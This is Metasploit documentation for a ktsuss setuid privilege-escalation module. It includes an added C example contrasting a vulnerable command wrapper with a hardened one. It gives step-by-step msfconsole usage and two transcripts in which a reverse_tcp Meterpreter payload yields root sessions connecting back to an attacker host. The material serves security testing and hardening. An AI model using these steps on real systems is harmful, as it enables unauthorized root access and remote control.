metasploit-gs/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md
2019-09-02 13:31:30 -04:00

Description

This module attempts to gain root privileges by exploiting a vulnerability in ktsuss versions 1.4 and prior.

The ktsuss binary is installed setuid root and does not drop privileges before executing the user-specified command, so that command runs with an effective UID of 0. The module writes its payload to a file under WritableDir and runs that file through ktsuss, which yields a session as root.
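The bug class is easier to see in code than in prose. The following is an added example, not ktsuss's or the module's source: a hypothetical setuid-root command wrapper (`suwrap`, function names assumed) that forks and execs the caller's command while euid is still 0, next to the hardened form that permanently sets the real, effective and saved ids to the caller before exec and aborts the child if it can still regain euid 0.

```c
/*
 * Added example, not ktsuss or Metasploit code: a minimal setuid-root
 * command wrapper showing the bug class the module exploits (privileges not
 * dropped before exec) next to the hardened form. All names are assumptions.
 *
 * Build: cc -Wall -o suwrap suwrap.c
 * To reproduce the setuid condition in a throwaway VM only:
 *   sudo chown root:root suwrap && sudo chmod 4755 suwrap
 *   ./suwrap id      # hardened path: uid, gid and euid are the caller's
 */
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork, let child_setup prepare the child, exec the command, and return the
 * command's exit status (-1 if fork/wait fails, 126 if setup fails, 127 if
 * exec fails). */
static int spawn_and_wait(char *const argv[], int (*child_setup)(void))
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (child_setup && child_setup() != 0)
            _exit(126);
        execvp(argv[0], argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* VULNERABLE pattern: the child inherits euid 0 from the setuid binary, so
 * "suwrap /bin/sh" hands the caller a root shell. */
int run_command_no_drop(char *const argv[])
{
    return spawn_and_wait(argv, NULL);
}

/* Permanently drop to the given uid/gid. Groups first, then user (the other
 * order fails once euid is no longer 0). With both arguments given, Linux
 * setregid/setreuid also overwrite the saved ids, so seteuid(0) cannot be
 * used later to climb back. Returns 0 on success, -1 on failure. */
int drop_privileges_to(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(1, &gid) < 0)
        return -1;
    if (setregid(gid, gid) < 0)
        return -1;
    if (setreuid(uid, uid) < 0)
        return -1;
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;
    return 0;
}

/* Self-check after a drop: returns 1 if the process can still obtain euid 0
 * (the drop left a root saved uid behind, or the caller really is root),
 * 0 otherwise. */
int can_regain_root(void)
{
    return seteuid(0) == 0 ? 1 : 0;
}

static int drop_to_caller(void)
{
    if (drop_privileges_to(getuid(), getgid()) != 0)
        return -1;
    /* A caller whose real uid is 0 is root regardless; anyone else must now
     * be unable to get euid 0 back, or we refuse to exec. */
    if (getuid() != 0 && can_regain_root())
        return -1;
    return 0;
}

/* HARDENED pattern: drop to the caller inside the child, then exec. */
int run_command_as_caller(char *const argv[])
{
    return spawn_and_wait(argv, drop_to_caller);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 2;
    }
    int rc = run_command_as_caller(argv + 1);
    if (rc < 0) {
        perror("suwrap");
        return 1;
    }
    return rc;
}
```

The two wrappers differ only in whether `drop_to_caller` runs before `execvp`; the check the module performs (running `id` through the helper and looking for `euid=0`) is exactly the observable difference between them. Dropping privileges in the child rather than the parent keeps the parent free to do privileged work afterwards, and verifying the drop with `seteuid(0)` catches a saved uid of 0 left behind by a half-done `seteuid`-only drop.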

Vulnerable Application

This module has been tested successfully on:

  • ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64)
  • ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64)

Verification Steps

  1. Start msfconsole
  2. Get a session
  3. use exploit/linux/local/ktsuss_suid_priv_esc
  4. set SESSION [SESSION]
  5. check
  6. run
  7. You should get a new root session

Options

KTSUSS_PATH

Path to the ktsuss executable on the target (default: /usr/bin/ktsuss)

WritableDir

A writable directory on the target file system where the payload is written before it is executed through ktsuss (default: /tmp)

Scenarios

ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64)

msf5 > use exploit/linux/local/ktsuss_suid_priv_esc 
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check

[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test)
[+] The target is vulnerable.
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test)
[*] Writing '/tmp/.lBanpIYpAJ60cwt' (389 bytes) ...
[*] Executing payload ...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.16.191.137

[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.137:53060) at 2019-08-19 09:18:29 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.137
OS           : Sparky 5.8 (Linux 4.19.0-5-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64)

msf5 > use exploit/linux/local/ktsuss_suid_priv_esc 
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check

[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test)
[+] The target is vulnerable.
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] /usr/bin/ktsuss is setuid
[*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test)
[*] Writing '/tmp/.R0aTPpB8aHk' (389 bytes) ...
[*] Executing payload ...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.16.191.167

[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.167:44534) at 2019-08-19 09:25:48 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.167
OS           : Sparky 6 (Linux 4.19.0-5-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >